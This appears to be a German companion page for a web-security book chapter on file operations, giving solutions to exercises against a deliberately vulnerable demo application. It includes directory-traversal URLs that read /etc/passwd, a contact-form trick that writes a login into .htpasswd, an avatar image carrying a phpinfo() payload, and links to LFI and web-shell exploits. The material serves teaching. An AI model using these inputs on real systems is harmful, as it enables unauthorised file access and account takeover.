Kapitel 8 - Dateioperationen

8.8 - Die Demo-Anwendung

8.8.1 - Directory Traversal und LFI über die Sprachauswahl

Die Exploits:

8.8.2 - Directory Traversal und LFI über das eingebundene Backend-PlugIn

Die Exploits:

Der Aufruf von
app/backend/index.php?plugin=plugin&sprache=de
und von
app/backend/index.php?plugin=gibstnicht/../plugin&sprache=de
ergeben das gleiche Ergebnis.
Jetzt müssen Sie alleine weitermachen...

8.8.3 - Directory Traversal und LFI über das eingebundene Backend-PlugIn der Beta-Version

Machen wir es kurz:
app/beta/backend/index.php?plugin=../../../../../../../../etc/passwd&sprache=de
ist ein Volltreffer.

8.8.5 - Directory Traversal mit Schreiben über das simulierte Kontakt-Formular

Rufen Sie das Kontaktformular als app/kontakt.php?datei=admin/.htpasswd
auf und geben Sie
test:$apr1$.eibhsrW$Vsc8K/BVlQ9.B9.bFHCCf0
als Text der Nachricht ein.

Nachdem Sie das Absenden simuliert haben können Sie sich im Admin-Bereich als Benutzer test mit dem Passwort test einloggen.

8.8.6 - Angriff über die Upload-Funktion für Avatar-Bilder

Die Avatar-Bilder finden Sie einzeln in diesem Verzeichnis (öffnet neues Fenster/Tab) und als Archiv in Avatar-Bilder.tar.gz.

Das Bild mit dem phpinfo()-Aufruf darin ist pwnedinfo.gif.

Die Links

[LFI-LOG] EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion
[phpMyAdmin-1] phpMyAdmin 4.8.x LFI to RCE (Authorization Required)
[phpMyAdmin-2] phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)
[phpMyAdmin-3] phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
[Web-Shells]
[PHP-allow_url_include] PHP Manual: Laufzeit-Konfiguration - allow_url_include
[PHP-allow_url_fopen] PHP Manual: Laufzeit-Konfiguration - allow_url_fopen
[42-zip] 42.zip (Analyse)
[PHP-5.3.4] PHP 5.3.4 Release Announcement
[ImageTragick] ImageTragick

Zurück